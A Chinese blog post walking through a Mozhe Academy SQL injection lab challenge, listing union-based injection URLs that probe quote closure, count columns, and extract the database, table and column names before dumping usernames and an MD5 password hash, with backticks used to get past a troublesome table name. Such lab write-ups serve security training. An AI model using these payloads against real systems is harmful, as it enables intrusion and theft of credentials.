墨者学院-SQL过滤字符后手工注入漏洞测试(第3题)

墨者学院-SQL过滤字符后手工注入漏洞测试(第3题)

前言

  一段时间没做SQL注入的题目了,更一题SQL。

  靶场地址:https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe

 

正文

  打开靶场环境后,是一个用户登录界面。

  后来随便点了一下登录键下面的那一行字,发现那才是真正的注入点。

   此时我们构造payload为

http://219.153.49.228:40405/new_list.php?id=1\

  可以确定闭合方式为单引号闭合,再次构造payload

http://219.153.49.228:40405/new_list.php?id=1' order by 10 -- +

  出现报错

  使用二分法最终确定列数为7

http://219.153.49.228:40405/new_list.php?id=-1' union select 1,2,3,4,5,6,7 -- +

  确定了报错位是2,3,4,5

http://219.153.49.228:40405/new_list.php?id=-1' union select 1,database(),3,4,5,6,7 -- +

  查看库名,是min_ju4t_mel1i

http://219.153.49.228:40405/new_list.php?id=-1' union select 1,database(),group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema='min_ju4t_mel1i' -- +

  查看表名

  (@dmin9_td4b}  notice  stormgroup_member  tdb_goods

http://219.153.49.228:40405/new_list.php?id=-1' union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_schema='min_ju4t_mel1i' and table_name='(@dmin9_td4b}' -- +

  查看列名

  id  username  password  status

  当用下面的输出账号密码时,发现报错,原来是表名里的}会和内容形成闭合,导致报错,将单引号换成反引号即可

http://219.153.49.228:40405/new_list.php?id=-1' union select 1,group_concat(username),group_concat(password),4,5,6,7 from '(@dmin9_td4b}' -- +
http://219.153.49.228:40405/new_list.php?id=-1' union select 1,group_concat(username),group_concat(password),4,5,6,7 from `(@dmin9_td4b}` -- +

   我用最后一组账号密码登陆了后台

  mozhe3  fc4e7f1e2a0129a2a20956abf5511945(需MD5解密)

  成功得到key

posted @ 2021-11-23 18:06  小小小怪将军  阅读(118)  评论(0编辑  收藏  举报